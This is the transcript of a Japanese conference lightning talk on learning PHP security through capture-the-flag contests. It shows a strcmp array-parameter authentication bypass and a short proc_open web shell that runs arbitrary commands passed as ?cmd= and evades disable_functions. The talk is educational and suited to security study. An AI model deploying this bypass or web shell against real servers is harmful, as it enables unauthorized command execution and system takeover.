Upgrade to Pro — share decks privately, control downloads, hide ads and more …

CTFで学ぶPHPセキュリティ

Sponsored · SiteGround - Reliable hosting with speed, security, and support you can count on.
Avatar for Ryoto Saito Ryoto Saito
March 31, 2019
Programming
4.1k
3

 CTFで学ぶPHPセキュリティ

PHPerKaigi 2019
ルーキーズLT

Avatar for Ryoto Saito

Ryoto Saito

March 31, 2019

More Decks by Ryoto Saito

See All by Ryoto Saito
コンテナ上シェル悪用の話とPure Bashでcurlが作れた話
Avatar for Ryoto Saito ryotosaito
2
630
シェル芸のせかい / the Shellgei World
Avatar for Ryoto Saito ryotosaito
2
1.7k

Other Decks in Programming

See All in Programming
Rethinking API Platform Filters
Avatar for Vincent Amstoutz vinceamstoutz
0
4.3k
[PHPerKaigi 2026]PHPerKaigi2025の企画CodeGolfが最高すぎて社内で内製して半年運営して得た内製と運営の知見
Avatar for Z.O.E. ikezoemakoto
0
310
Understanding Apache Lucene - More than just full-text search
Avatar for Alexander Reelsen spinscale
0
150
おれのAgentic Coding 2026/03
Avatar for TsukasaSekiguchi tsukasagr
1
120
LM Linkで(非力な!)ノートPCでローカルLLM
Avatar for 瀬尾佳隆 seosoft
0
290
PHP 7.4でもOpenTelemetryゼロコード計装がしたい! / PHPerKaigi 2026
Avatar for Arthur arthur1
1
450
GC言語のWasm化とComponent Modelサポートの実践と課題 - Scalaの場合
Avatar for Rikito Taniguchi tanishiking
0
130
PHPのバージョンアップ時にも役立ったAST(2026年版)
Avatar for Atsushi Matsuo matsuo_atsushi
0
270
Codexに役割を持たせる 他のAIエージェントと組み合わせる実務Tips
Avatar for o8n o8n
4
1.4k
Tamach-sre-3_ANDPAD-shimaison93
Avatar for shimaison93 mane12yurks38
0
220
我々はなぜ「層」を分けるのか〜「関心の分離」と「抽象化」で手に入れる変更に強いシンプルな設計〜 #phperkaigi / PHPerKaigi 2026
Avatar for shogogg shogogg
2
730
Codex CLI でつくる、Issue から merge までの開発フロー
Avatar for amata1219 amata1219
0
260

Featured

See All Featured
The Director’s Chair: Orchestrating AI for Truly Effective Learning
Avatar for Mike Taylor tmiket
1
140
Sharpening the Axe: The Primacy of Toolmaking
Avatar for Bryan Cantrill bcantrill
46
2.7k
Build The Right Thing And Hit Your Dates
Avatar for Maggie C. maggiecrowley
39
3.1k
How Fast Is Fast Enough? [PerfNow 2025]
Avatar for Tammy Everts tammyeverts
3
510
Test your architecture with Archunit
Avatar for Yoan thirion
1
2.2k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
Avatar for Tammy Everts tammyeverts
55
3.3k
It's Worth the Effort
Avatar for 3n 3n
188
29k
Building Experiences: Design Systems, User Experience, and Full Site Editing
Avatar for Michelle Schulp Hunt marktimemedia
0
460
Are puppies a ranking factor?
Avatar for Jono Alderson jonoalderson
1
3.2k
How to Align SEO within the Product Triangle To Get 
Buy-In & Support - #RIMC
Avatar for Aleyda Solis aleyda
1
1.5k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
Avatar for Marc Duiker marcduiker
35
2.4k
Product Roadmaps are Hard
Avatar for C. Todd Lombardo iamctodd
PRO
55
12k

Transcript

  1. CTFで学ぶ PHPセキュリティ 2019/3/31 PHPerKaigi ルーキーズLT Ryoto (@systemctl_ryoto) 1

  2. CTF - Capture the Flag 2

  3. CTF Capture the Flag • FPSのゲームルール の1種 • 敵陣のフラッグを自陣 に持ち帰る

    • 由来は物理的な遊び • 転じて… 3

  4. CTF Capture the Flag • 情報セキュリティ的に脆弱な 「何か」が用意される • その脆弱性を突いてFlagを取得 する競技

    ※ Flag = 仮想的な機密文字列 flag{PHP_is_s3cur3!} ↑過去に本当に見たことあるやつ • 問題ベースで楽しくセキュリティ が勉強できる! • 徳丸さんの挑戦状もCTF 4

  5. PHPer チャレンジ は シェルを 奪えます ls -al /もmysqldumpも実行できる 5

  6. CTFの 主要な ジャンル 厳密な分類は大会やサイトによって 微妙に異なる 6 Pwn プログラムの脆弱性を突く Reverse リバースエンジニアリング

    Forensic パケットやFile systemなど Crypto 暗号解読 Web クライアントからサーバまで

  7. Webの CTF 情報セキュリティ的に脆弱な「何か」 • 「Webサイト」 • 「ソースコード」 どこが脆弱かはもちろん、どこにFlag があるのかがわからないことも たのしい謎解きの始まり

    7

  8. CTFのPHP問題例 - 実際の問題の一部分 - 8

  9. 前提:パスワード認証のソースを入手した include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD)

    == 0) { echo FLAG; } 目標:なんとか突破したい! 言語仕様に関する問題 9

  10. 前提:パスワード認証のソースを入手した include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD)

    == 0) { echo FLAG; } 目標:なんとか突破したい! 言語仕様に関する問題 10

  11. 言語仕様に関する問題 11

  12. 言語仕様に関する問題 12

  13. 言語仕様に関する問題 13 if (strcmp($_GET['password'], PASSWORD) == 0) strcmpは配列や関数などを受け取るとnull+Warningを返す) <?php var_dump($_GET);

    http://localhost/dump.php?password[]=admin にアクセス↓ array(1) { ["password"] => array(1) { [0] => string(5) "admin" } }

  14. include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD) ==

    0) { echo FLAG; } 目標:なんとか突破したい! 先ほどのヒントを踏まえると… 言語仕様に関する問題 14

  15. include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD) ==

    0) { echo FLAG; } 目標:なんとか突破したい! Ans: http://target.host/?password[]= 言語仕様に関する問題 15

  16. 前提:任意の.phpファイルがUpload、実行できる脆弱性が発覚 <?php phpinfo(); disable_functions pcntl_exec, exec, popen, passthru, shell_exec, system

    目的:シェルを奪いたい!(任意コマンドを実行したい) 任意コード実行 16

  17. (注:shell_execと等価なので`cmd`はダメ) 任意コード実行 17

  18. pcntl_exec, exec, popen, passthru, shell_exec, system... proc_open関数がノーマーク 任意コード実行 18

  19. pcntl_exec, exec, popen, passthru, shell_exec, system... proc_open関数がノーマーク 前提:任意の.phpファイルがUpload、実行できる脆弱性が発覚 目的:シェルを奪いたい!(任意コマンドを実行したい) 任意コード実行

    19

  20. Ans. 以下のPHPファイルをアップロード <?php $cmd = $_GET['cmd'] $process = proc_open($cmd, [1=>["pipe",

    "w"]], $pipes); echo stream_get_contents($pipes[1]); これを1回アップロードすれば?cmd=...でやりたい放題 任意コード実行 20

  21. CTFに興味が湧いてきた人は! 21

  22. やってみよう! 22 常設CTF(Web・PHP問題が入門から充実している) • https://www.root-me.org/en/Challenges/Web-Server/ • http://websec.fr/ ※ 垢登録するときは捨てパスワードを使いましょう 慣れたらコンテストに参加!

    • https://ctftime.org

  23. 困ったときは 23 CTFでは解答例のことを Write-up と呼びます。 考えてもわからなかったら答えを探すのもあり! ("Write-up"で検索して問題を探す荒技もあり)

  24. Thank you! @systemctl_ryoto 24